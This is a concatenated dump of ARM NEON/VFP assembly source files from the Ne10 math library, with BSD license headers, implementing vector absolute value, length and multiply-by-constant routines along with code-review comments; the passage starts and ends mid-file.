vabs.f32 d0, d0
vst1.32 {d0}, [r0]!
bgt .L_residualloop_vec2
.L_check_mainloop_vec2:
cbz r2, .L_return_vec2
@ load the current set of values (vld2 de-interleaves x into q0, y into q1)
vld2.32 {q0-q1}, [r1]! @ for current set
.L_mainloop_vec2:
@ absolute values of the current set (caller-saved scratch only)
vabs.f32 q8, q0 @ q8 = abs( q0 )
vabs.f32 q9, q1 @ q9 = abs( q1 )
@ store the result for the current set (vst2 re-interleaves x/y)
vst2.32 {d16,d17,d18,d19}, [r0]!
subs r2, r2, #1
@ load the next set
@ NOTE(review): this load also executes on the final iteration,
@ reading 32 bytes past the end of src - confirm callers tolerate it
vld2.32 {q0-q1}, [r1]!
bgt .L_mainloop_vec2 @ loop if r2 > 0, if we have another 4 vec2s
.L_return_vec2:
@ return NE10_OK (0)
mov r0, #0
bx lr
.align 4
.global ne10_abs_vec3f_neon
.thumb
.thumb_func
ne10_abs_vec3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_abs_vec3f(arm_vec3t_t * dst,
@ arm_vec3f_t * src,
@ unsigned int count);
@
@ Computes the component-wise absolute value of count 3-float vectors.
@
@ r0: *dst & the current dst entry's address
@ r1: *src & current src entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@ r3: the number of items that are residual that will be processed at the begin of
@ the input array
@
@ FIX: the main loop previously used q5/q6/q7 as scratch. Those alias
@ d10-d15, which are callee-saved under the AAPCS VFP register rules,
@ so clobbering them without saving corrupted the caller's state.
@ Scratch now uses q8/q9/q10 (d16-d21), which are caller-saved.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4; calculate the residual loop
asr r2, r2, #2 @ r2 = count >> 2; calculate the main loop
cbz r3, .L_check_mainloop_vec3
.L_residualloop_vec3:
@ process the residual items in the input array
vld3.f32 {d0[0], d2[0], d4[0]}, [r1]! @ The values are loaded like so:
@ q0 = { V.x, -, -, - };
@ q1 = { V.y, -, -, - };
@ q2 = { V.z, -, -, - };
subs r3, r3, #1
@ absolute values
vabs.f32 d0, d0
vabs.f32 d2, d2
vabs.f32 d4, d4
vst3.32 {d0[0], d2[0], d4[0]}, [r0]!
bgt .L_residualloop_vec3
.L_check_mainloop_vec3:
cbz r2, .L_return_vec3
@ load the current set of values (vld3 de-interleaves: q0 = x, q1 = y, q2 = z)
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]! @ for current set
.L_mainloop_vec3:
@ absolute values of the current set (caller-saved scratch only)
vabs.f32 q8, q0
vabs.f32 q9, q1
vabs.f32 q10, q2
@ store the result for the current set (vst3 re-interleaves x/y/z)
vst3.32 {d16, d18, d20}, [r0]!
vst3.32 {d17, d19, d21}, [r0]!
subs r2, r2, #1
@ load the next set
@ NOTE(review): this load also executes on the final iteration,
@ reading 48 bytes past the end of src - confirm callers tolerate it
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]! @ for next set
bgt .L_mainloop_vec3 @ loop if r2 > 0, if we have another 4 vec3s
.L_return_vec3:
@ return NE10_OK (0)
mov r0, #0
bx lr
.align 4
.global ne10_abs_vec4f_neon
.thumb
.thumb_func
ne10_abs_vec4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_abs_vec4f(arm_vec4f_t * dst,
@ arm_vec4f_t * src,
@ unsigned int count);
@
@ Computes the component-wise absolute value of count 4-float vectors.
@ Scratch registers q10-q13 (d20-d27) are caller-saved under AAPCS.
@
@ r0: *dst & the current dst entry's address
@ r1: *src & current src entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@ r3: the number of items that are residual that will be processed at the begin of
@ the input array
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4; calculate the residual loop
asr r2, r2, #2 @ r2 = count >> 2; calculate the main loop
cbz r3, .L_check_mainloop_vec4
.L_residualloop_vec4:
@ process the residual items one vec4 (one q register) at a time
vld1.f32 {d0, d1}, [r1]! @ The values are loaded like so:
@ q0 = { V.x, V.y, V.z, V.w };
subs r3, r3, #1
@ absolute values
vabs.f32 q0, q0
vst1.32 {d0, d1}, [r0]!
bgt .L_residualloop_vec4
.L_check_mainloop_vec4:
cbz r2, .L_return_vec4
@ load the current set of values (vld4 de-interleaves into x/y/z/w planes q0..q3)
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]! @ for current set
.L_mainloop_vec4:
@ absolute values of the current set
vabs.f32 q10, q0
vabs.f32 q11, q1
vabs.f32 q12, q2
vabs.f32 q13, q3
@ store the result for the current set (vst4 re-interleaves x/y/z/w)
vst4.32 {d20, d22, d24, d26}, [r0]!
vst4.32 {d21, d23, d25, d27}, [r0]!
subs r2, r2, #1
@ load the next set
@ NOTE(review): this load also executes on the final iteration,
@ reading 64 bytes past the end of src - confirm callers tolerate it
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]! @ for next set
bgt .L_mainloop_vec4 @ loop if r2 > 0, if we have another 4 vec4s
.L_return_vec4:
@ return NE10_OK (0)
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 1,608 | modules/math/NE10_submat.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_submat.asm.s
@
|
open-vela/external_Ne10 | 12,661 | modules/math/NE10_len.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_len.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_len_vec2f_neon
.thumb
.thumb_func
ne10_len_vec2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_len_vec2f(arm_float_t * dst,
@ arm_vec2f_t * src,
@ unsigned int count);
@
@ Computes dst[i] = sqrt(x^2 + y^2) of each vec2. sqrt(s) is formed as
@ s * rsqrt(s), where rsqrt uses VRSQRTE refined by one VRSQRTS
@ Newton-Raphson step, so results are approximate, not IEEE-exact.
@ NOTE(review): for a zero vector s == 0, VRSQRTE yields +inf and
@ 0 * inf produces NaN rather than 0 - confirm whether callers care.
@
@ r0: *dst & the current dst entry's address
@ r1: *src & current src entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@ r3: the number of items that are left to be processed at the end of
@ the input array
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r3; This is what's left to be processed after this loop
cbz r2, .L_check_vec2
@ load values for the first iteration (vld2: q0 = x plane, q1 = y plane)
vld2.32 {q0-q1}, [r1]!
subs r2, r2, #4
@ calculate sum of square of the components
vmul.f32 q2, q0, q0
vmla.f32 q2, q1, q1
ble .L_mainloopend_vec2
.L_mainloop_vec2:
@ load the next set of values
vld2.32 {q0-q1}, [r1]!
subs r2, r2, #4
@ get SQRT of the last vector while loading a new vector:
@ q8 = refined rsqrt(q2); q2 = q2 * rsqrt(q2) = sqrt(q2)
vrsqrte.f32 q3, q2
vmul.f32 q8, q2, q3
vrsqrts.f32 q8, q8, q3
vmul.f32 q8, q3, q8
vmul.f32 q2, q2, q8
vst1.32 {q2}, [r0]!
@ calculate sum of square of the components
vmul.f32 q2, q0, q0
vmla.f32 q2, q1, q1
bgt .L_mainloop_vec2 @ loop while r2 > 0, i.e. at least another 4 vectors (8 floats) remain
.L_mainloopend_vec2:
@ the last iteration for this call
@ get SQRT of the last vector (same rsqrt refinement as above)
vrsqrte.f32 q3, q2
vmul.f32 q8, q2, q3
vrsqrts.f32 q8, q8, q3
vmul.f32 q8, q3, q8
vmul.f32 q2, q2, q8
vst1.32 {q2}, [r0]!
.L_check_vec2:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_vec2
.L_secondloop_vec2:
@ process the last few items left in the input array
vld1.f32 d0, [r1]! @ Fill in d0 = { V.x, V.y };
subs r3, r3, #1
vmul.f32 d0, d0, d0 @ d0= { V.x^2, V.y^2 };
vpadd.f32 d0, d0, d0 @ d0= { V.x^2 + (V.y^2), V.y^2 + (V.x^2) }; // d0 = d0 + (d1^2)
@ get SQRT of the vector: d0 = d0 * rsqrt(d0) = sqrt(d0)
vrsqrte.f32 d2, d0
vmul.f32 d1, d0, d2
vrsqrts.f32 d1, d1, d2
vmul.f32 d1, d2, d1
vmul.f32 d0, d0, d1
vst1.32 d0[0], [r0]!
bgt .L_secondloop_vec2
.L_return_vec2:
@ return NE10_OK (0)
mov r0, #0
bx lr
.align 2
.global ne10_len_vec3f_neon
.thumb
.thumb_func
ne10_len_vec3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_len_vec3f(arm_float_t * dst,
@ arm_vec3f_t * src,
@ unsigned int count);
@
@ Computes dst[i] = sqrt(x^2 + y^2 + z^2) of each vec3. sqrt(s) is
@ formed as s * rsqrt(s) with VRSQRTE refined by one VRSQRTS
@ Newton-Raphson step, so results are approximate, not IEEE-exact.
@ NOTE(review): a zero vector yields NaN (0 * inf), not 0 - confirm
@ whether callers care.
@
@ r0: *dst & the current dst entry's address
@ r1: *src & current src entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@ r3: the number of items that are left to be processed at the end of
@ the input array
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r3; This is what's left to be processed after this loop
cbz r2, .L_check_vec3
@ load values for the first iteration (vld3: q0 = x, q1 = y, q2 = z planes)
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
subs r2, r2, #4
@ calculate sum of square of the components
vmul.f32 q9, q0, q0
vmla.f32 q9, q1, q1
vmla.f32 q9, q2, q2
ble .L_mainloopend_vec3
.L_mainloop_vec3:
@ load the next set of values
vld3.32 {d0,d2,d4}, [r1]!
vld3.32 {d1,d3,d5}, [r1]!
subs r2, r2, #4
@ get SQRT of the last vector while loading a new vector:
@ q8 = refined rsqrt(q9); q9 = q9 * rsqrt(q9) = sqrt(q9)
vrsqrte.f32 q3, q9
vmul.f32 q8, q9, q3
vrsqrts.f32 q8, q8, q3
vmul.f32 q8, q3, q8
vmul.f32 q9, q9, q8
vst1.32 {q9}, [r0]!
@ calculate sum of square of the components
vmul.f32 q9, q0, q0
vmla.f32 q9, q1, q1
vmla.f32 q9, q2, q2
bgt .L_mainloop_vec3 @ loop while r2 > 0, i.e. at least another 4 vectors (12 floats) remain
.L_mainloopend_vec3:
@ the last iteration for this call
@ get SQRT of the last vector (same rsqrt refinement as above)
vrsqrte.f32 q3, q9
vmul.f32 q8, q9, q3
vrsqrts.f32 q8, q8, q3
vmul.f32 q8, q3, q8
vmul.f32 q9, q9, q8
vst1.32 {q9}, [r0]!
.L_check_vec3:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_vec3
.L_secondloop_vec3:
@ process the last few items left in the input array
vld3.f32 {d0[0], d2[0], d4[0]}, [r1]! @ The values are loaded like so:
@ q0 = { V.x, -, -, - };
@ q1 = { V.y, -, -, - };
@ q2 = { V.z, -, -, - };
subs r3, r3, #1
vmul.f32 q0, q0, q0 @ V.x^2
vmla.f32 q0, q1, q1 @ V.x^2 + V.y^2
vmla.f32 q0, q2, q2 @ V.x^2 + V.y^2 + V.z^2
@ get SQRT of the vector: q0 = q0 * rsqrt(q0) = sqrt(q0); only lane 0 is stored
vrsqrte.f32 q2, q0
vmul.f32 q1, q0, q2
vrsqrts.f32 q1, q1, q2
vmul.f32 q1, q2, q1
vmul.f32 q0, q0, q1
vst1.32 d0[0], [r0]!
bgt .L_secondloop_vec3
.L_return_vec3:
@ return NE10_OK (0)
mov r0, #0
bx lr
.align 2
.global ne10_len_vec4f_neon
.thumb
.thumb_func
ne10_len_vec4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_len_vec4f(arm_float_t * dst,
@ arm_vec4f_t * src,
@ unsigned int count);
@
@ Computes dst[i] = sqrt(x^2 + y^2 + z^2 + w^2) of each vec4. sqrt(s)
@ is formed as s * rsqrt(s) with VRSQRTE refined by one VRSQRTS
@ Newton-Raphson step, so results are approximate, not IEEE-exact.
@ NOTE(review): a zero vector yields NaN (0 * inf), not 0 - confirm
@ whether callers care.
@
@ r0: *dst & the current dst entry's address
@ r1: *src & current src entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@ r3: the number of items that are left to be processed at the end of
@ the input array
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r3; This is what's left to be processed after this loop
cbz r2, .L_check_vec4
@ load values for the first iteration (vld4: q0..q3 = x/y/z/w planes)
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
subs r2, r2, #4
@ calculate sum of square of the components
vmul.f32 q9, q0, q0
vmla.f32 q9, q1, q1
vmla.f32 q9, q2, q2
vmla.f32 q9, q3, q3
ble .L_mainloopend_vec4
.L_mainloop_vec4:
@ load the next set of values
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
subs r2, r2, #4
@ get SQRT of the last vector while loading a new vector:
@ q8 = refined rsqrt(q9); q9 = q9 * rsqrt(q9) = sqrt(q9)
vrsqrte.f32 q10, q9
vmul.f32 q8, q9, q10
vrsqrts.f32 q8, q8, q10
vmul.f32 q8, q10, q8
vmul.f32 q9, q9, q8
vst1.32 {q9}, [r0]!
@ calculate sum of square of the components
vmul.f32 q9, q0, q0
vmla.f32 q9, q1, q1
vmla.f32 q9, q2, q2
vmla.f32 q9, q3, q3
bgt .L_mainloop_vec4 @ loop while r2 > 0, i.e. at least another 4 vectors (16 floats) remain
.L_mainloopend_vec4:
@ the last iteration for this call
@ get SQRT of the last vector (same rsqrt refinement as above)
vrsqrte.f32 q10, q9
vmul.f32 q8, q9, q10
vrsqrts.f32 q8, q8, q10
vmul.f32 q8, q10, q8
vmul.f32 q9, q9, q8
vst1.32 {q9}, [r0]!
.L_check_vec4:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_vec4
.L_secondloop_vec4:
@ process the last few items left in the input array
vld4.f32 {d0[0], d2[0], d4[0], d6[0]}, [r1]! @ The values are loaded like so:
@ q0 = { V.x, -, -, - };
@ q1 = { V.y, -, -, - };
@ q2 = { V.z, -, -, - };
@ q3 = { V.w, -, -, - };
subs r3, r3, #1
vmul.f32 q0, q0, q0 @ V.x^2
vmla.f32 q0, q1, q1 @ V.x^2 + V.y^2
vmla.f32 q0, q2, q2 @ V.x^2 + V.y^2 + V.z^2
vmla.f32 q0, q3, q3 @ V.x^2 + V.y^2 + V.z^2 + V.w^2
@ get SQRT of the vector: q0 = q0 * rsqrt(q0) = sqrt(q0); only lane 0 is stored
vrsqrte.f32 q2, q0
vmul.f32 q1, q0, q2
vrsqrts.f32 q1, q1, q2
vmul.f32 q1, q2, q1
vmul.f32 q0, q0, q1
vst1.32 d0[0], [r0]!
bgt .L_secondloop_vec4
.L_return_vec4:
@ return NE10_OK (0)
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 9,791 | modules/math/NE10_mulc.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_mulc.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_mulc_float_asm
.thumb
.thumb_func
ne10_mulc_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mulc_float(arm_vec2f_t * dst,
@ arm_float_t * src, const arm_float_t * cst,
@ unsigned int count)
@
@ Computes dst[i] = src[i] * cst for i in [0, count).
@
@ r0: *dst
@ r1: *src
@ r2: cst - the code below reads r2 as the raw float bits of the
@ constant itself (vmov into s3), i.e. the constant is passed
@ by value; NOTE(review): the prototype comment above says
@ "* cst" - confirm against the public header
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@ Returns NE10_OK in r0.
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndFloat
vmov s3, r2 @ the constant is loop-invariant: move it into s3 once,
@ outside the loop (previously re-done every iteration)
mov r5, #0
.LoopBeginFloat:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i]
vmul.f32 s10, s1, s3 @ s10 = src[i] * cst
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the result back into the main memory
add r5, r5, #4 @ increase the offset by 1*sizeof(float)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginFloat @ Continue if "i < count"
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_mulc_vec2f_asm
.thumb
.thumb_func
ne10_mulc_vec2f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mulc_vec2f(arm_vec2f_t * dst,
@ arm_vec2f_t * src, const arm_vec2f_t * cst,
@ unsigned int count)
@
@ Computes dst[i] = src[i] * (*cst), component-wise, for i in [0, count).
@
@ r0: *dst
@ r1: *src
@ r2: *cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@ Returns NE10_OK in r0.
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec2F
@ *cst is const and loop-invariant: load its components once here
@ rather than on every iteration (assumes dst does not alias *cst,
@ which the const contract implies)
vldr s3, [r2, #0] @ Load cst->x
vldr s4, [r2, #4] @ Load cst->y
mov r5, #0
.LoopBeginVec2F:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i].x and src[i].y
vldr s2, [r6, #4]
vmul.f32 s10, s1, s3 @ s10 = src[i].x * cst->x
vmul.f32 s11, s2, s4 @ s11 = src[i].y * cst->y
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the results back into the main memory
vstr s11, [r7, #4]
add r5, r5, #8 @ increase the offset by 2*sizeof(float) (for x and y)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginVec2F @ Continue if "i < count"
.LoopEndVec2F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_mulc_vec3f_asm
.thumb
.thumb_func
ne10_mulc_vec3f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mulc_vec3f(arm_vec3f_t * dst,
@ arm_vec3f_t * src, const arm_vec3f_t * cst,
@ unsigned int count)
@
@ Computes dst[i] = src[i] * (*cst), component-wise, for i in [0, count).
@
@ r0: *dst
@ r1: *src
@ r2: *cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@ Returns NE10_OK in r0.
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec3F
@ *cst is const and loop-invariant: load its components once here
@ rather than on every iteration (assumes dst does not alias *cst,
@ which the const contract implies)
vldr s4, [r2, #0] @ Load cst->x
vldr s5, [r2, #4] @ Load cst->y
vldr s6, [r2, #8] @ Load cst->z
mov r5, #0
.LoopBeginVec3F:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i].x, src[i].y, and src[i].z
vldr s2, [r6, #4]
vldr s3, [r6, #8]
vmul.f32 s10, s1, s4 @ s10 = src[i].x * cst->x
vmul.f32 s11, s2, s5 @ s11 = src[i].y * cst->y
vmul.f32 s12, s3, s6 @ s12 = src[i].z * cst->z
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the results back into the main memory
vstr s11, [r7, #4]
vstr s12, [r7, #8]
add r5, r5, #12 @ increase the offset by 3*sizeof(float) (for x, y, and z)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginVec3F @ Continue if "i < count"
.LoopEndVec3F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_mulc_vec4f_asm
.thumb
.thumb_func
ne10_mulc_vec4f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mulc_vec4f(arm_vec4f_t * dst,
@ arm_vec4f_t * src, const arm_vec4f_t * cst,
@ unsigned int count)
@
@ Computes dst[i] = src[i] * (*cst), component-wise, for i in [0, count).
@
@ r0: *dst
@ r1: *src
@ r2: *cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@ Returns NE10_OK in r0.
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec4F
@ *cst is const and loop-invariant: load its components once here
@ rather than on every iteration (assumes dst does not alias *cst,
@ which the const contract implies)
vldr s5, [r2, #0] @ Load cst->x
vldr s6, [r2, #4] @ Load cst->y
vldr s7, [r2, #8] @ Load cst->z
vldr s8, [r2, #12] @ Load cst->w
mov r5, #0
.LoopBeginVec4F:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i].x, src[i].y, src[i].z, and w
vldr s2, [r6, #4]
vldr s3, [r6, #8]
vldr s4, [r6, #12]
vmul.f32 s10, s1, s5 @ s10 = src[i].x * cst->x
vmul.f32 s11, s2, s6 @ s11 = src[i].y * cst->y
vmul.f32 s12, s3, s7 @ s12 = src[i].z * cst->z
vmul.f32 s13, s4, s8 @ s13 = src[i].w * cst->w
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the results back into the main memory
vstr s11, [r7, #4]
vstr s12, [r7, #8]
vstr s13, [r7, #12]
add r5, r5, #16 @ increase the offset by 4*sizeof(float) (for x, y, z, and w)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginVec4F @ Continue if "i < count"
.LoopEndVec4F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
|
open-vela/external_Ne10 | 1,607 | modules/math/NE10_cross.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
